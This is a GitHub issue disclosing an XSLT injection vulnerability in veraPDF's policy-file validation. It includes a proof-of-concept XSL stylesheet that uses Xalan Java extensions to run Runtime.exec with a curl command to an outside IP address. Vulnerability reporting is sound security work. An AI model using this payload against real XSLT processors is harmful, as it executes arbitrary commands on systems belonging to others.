Skip to content

veraPDF has an XSLT injection vulnerability. #1415

Closed
@c1gar

Description

@c1gar

The issue occurs when clicking the execution button, where users can drag and drop policy files into the area where a policy file is not chosen. These policy files are user-controllable, and during the validation of configuration files, an XSL transformation operation is performed. The XSL file used for this operation is uploaded by the user. Due to veraPDF not setting secure parameters during XSL transformation, this could potentially lead to a remote code execution (RCE) vulnerability.
1111
test.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'curl http://101.200.214.173:8888 ')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet>
Uploading 222).PNG…

Metadata

Metadata

Assignees

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions